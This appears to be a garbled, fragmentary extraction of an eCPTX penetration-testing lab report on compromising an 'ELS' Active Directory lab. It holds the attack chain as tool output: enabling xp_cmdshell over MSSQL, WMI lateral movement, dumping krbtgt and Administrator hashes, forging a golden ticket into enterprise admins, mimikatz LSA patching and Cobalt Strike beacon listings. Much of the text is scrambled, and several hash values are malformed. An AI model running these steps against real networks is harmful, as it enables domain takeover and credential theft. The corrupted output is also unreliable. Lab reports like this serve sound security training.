Professional Documents
Culture Documents
E CPTX
E CPTX
E CPTX
101
3. 10.100.11.150
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
SQL> enable_xp_cmdshell
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'show
advanced options' changed from 1 to 1. Run the RECONFIGURE statement
to install.
--------------------------------------------------------------------
---
---------
nt service\mssql$db1
NULL
SQL>
Execute comands
11
To gain access to jumbox over wmic
12
After gaining the shell access I tried to escalate my privs and managed to do so via reading
unattended install file which gave me administrator
5. 10.100.10.253
From jumpbox (10.100.11.100) and using uatoperator I started to execute commands over
wmi
Object RDN
** SAM ACCOUNT **
: krbtgt
SAM Username
Account Type
User Account Control : Account expiration : Password last change :
Object Security ID : Object Relative ID : 502
e4ba51c7157fe411po603b661f1ccfbe e4ba51c7111fe46652603b661f1ccfbe
1389eb4be52e304d1a753a704187dd66
: krbtgt
: 30000000 ( USER_OBJECT )
S-1-5-21-235po937-599822933-351157107-502
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
aes256_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
* Primary:Kerberos *
Default Salt : ELS-CHILD.ELS.LOCALkrbtgt Credentials
Kerberos-Newer-Keys
* Primary:WDigest *
01 1cf79ec9db39ca3ui8979d9cca4bdef2
.................................. 28
829bb53e575583c3io7f40aabf43f05 29 0696af48622e71a7oi7cccc94c95d1b
6. 10.100.10.254
To gain access to the parent domain DC, I created a golden ticket using the krbtgt I got before
for my user adding him to the enterprise admins group
[+] host called home, sent: 998474 bytes [+] received output:
User
Domain
SID
User Id
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2128511948-1851e4348-1523442862-519 ;
ServiceKey: 1cf79ec9db39ca3ui8979d9cca4bdef2 - rc4_hmac_nt
Lifetime : 10/29/2019 5:08:32 PM ; 10/26/2029 5:08:32 PM ;
10/26/2029 5:08:32 PM
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
: admin1
: els-child.els.local (ELS-CHILD)
: S-1-5-21-23589937-1851e4348-351157107 : 500
Object RDN
** SAM ACCOUNT **
: krbtgt
: krbtgt
: 30000000 ( USER_OBJECT )
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
f4f88438c968756e75252ca4056b0607
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
19
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
aes256_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
aes128_hmac (4096) :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
des_cbc_md5 (4096) : 57fb67328f4651a7
* Primary:Kerberos *
Default Salt : ELS.LOCALkrbtgt Credentials
des_cbc_md5 :
d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9 *
Packages *
Kerberos-Newer-Keys
* Primary:WDigest *
01 b4e712be7d587a19fe5b18b07a7ff799 ...........................
29 e1ac403d7b274c3d8c2e2c2d40ab7ccc
Object RDN
** SAM ACCOUNT **
SAM Username
Account Type
User Account Control :
Account expiration
Password last change
Object Security ID
Object Relative ID
:
:
:
: 500
: Administrator
: Administrator
: 30000000 ( USER_OBJECT )
S-1-5-21-2128511948-1856962338-1523442862-500
49623ccc820121223b3f0f571b77186
Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : ELS.LOCALAdministrator Default Iterations : 4096
Credentials
| PID 2052
| TID 2676
| LSA Process is now R/W
| LUID 0 ; 1632426 (00000000:0018e8aa)
\_ msv1_0 - data copy @ 0000004BBB9CA130 : OK ! \_ kerberos - data
copy @ 0000004BBB97F318
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000004BBB9745C8 (16) -> null
beacon> ls \\lab-dc01.els.local\c$
[*] Tasked beacon to list files in \\lab-dc01.els.local\c$ [+] host
called home, sent: 41 bytes
[*] Listing: \\lab-dc01.els.local\c$\
dir
03/18/2014 03:33:36
$Recycle.Bin
Windows IP Configuration
Ethernet adapter Ethernet0: